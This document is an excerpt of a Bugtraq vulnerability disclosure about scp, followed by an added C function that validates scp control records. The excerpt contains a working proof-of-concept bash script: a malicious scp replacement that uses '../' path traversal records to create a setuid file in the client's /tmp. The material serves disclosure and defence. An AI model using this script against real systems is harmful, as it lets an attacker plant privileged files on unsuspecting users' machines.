scp File Create/Overwrite Vulnerability
Excerpted from original bugtraq posting by Michal Zalewski <lcamtuf@tpi.pl>

---
As a proof of concept, I created a trivial scp replacement (put it on the remote machine in the place of the original scp binary - usually in /usr/local/bin). It will try to exploit any file transfer, creating a setuid /tmp/ScpIsBuggy file on the client system:

#!/bin/bash
echo "D0755 0 ../../../../../../tmp/nope"
echo "D0755 0 ../../../../../../tmp"
echo "C4755 200 ScpIsBuggy"
dd if=/dev/urandom of=/dev/stdout bs=200 count=1 2>/dev/null
dd if=/dev/zero of=/dev/stdout bs=1 count=2 2>/dev/null
---
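The control records in the excerpt can be rejected on the receiving side before anything is written to disk. The following is an added example, not part of the original posting and not scp's own code: check_record() is a hypothetical helper, the benign record is constructed, and refusing setuid/setgid/sticky bits from the peer is an assumed policy.

```c
#include <stdio.h>
#include <string.h>

/* Verdicts for one scp control record received from the remote side. */
enum verdict { REC_OK, REC_MALFORMED, REC_BAD_NAME, REC_BAD_MODE };

/*
 * check_record() is a hypothetical helper written for this example.
 * It validates one record of the form "<C|D><4 octal digits> <size> <name>"
 * (the shape shown in the excerpt), with the trailing newline already removed.
 */
enum verdict check_record(const char *rec)
{
    unsigned mode = 0;
    const char *p, *name;
    int i;

    if (rec[0] != 'C' && rec[0] != 'D')
        return REC_MALFORMED;
    for (i = 1; i <= 4; i++) {              /* exactly four octal digits */
        if (rec[i] < '0' || rec[i] > '7')
            return REC_MALFORMED;
        mode = (mode << 3) | (unsigned)(rec[i] - '0');
    }
    if (rec[5] != ' ' || rec[6] < '0' || rec[6] > '9')
        return REC_MALFORMED;
    for (p = rec + 6; *p >= '0' && *p <= '9'; p++)
        ;                                   /* skip the decimal size field */
    if (*p != ' ')
        return REC_MALFORMED;
    name = p + 1;
    /* The name must be a single path component inside the target directory. */
    if (*name == '\0' || strchr(name, '/') != NULL ||
        strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return REC_BAD_NAME;
    /* Assumed policy: never accept setuid/setgid/sticky bits from the peer. */
    if (mode & 07000)
        return REC_BAD_MODE;
    return REC_OK;
}

int main(void)
{
    /* Records from the excerpt plus one constructed benign record. */
    const char *recs[] = { "D0755 0 ../../../../../../tmp/nope",
                           "C4755 200 ScpIsBuggy", "C0644 200 notes.txt" };
    for (size_t i = 0; i < sizeof recs / sizeof recs[0]; i++)
        printf("%d  %s\n", check_record(recs[i]), recs[i]);
    return 0;
}
```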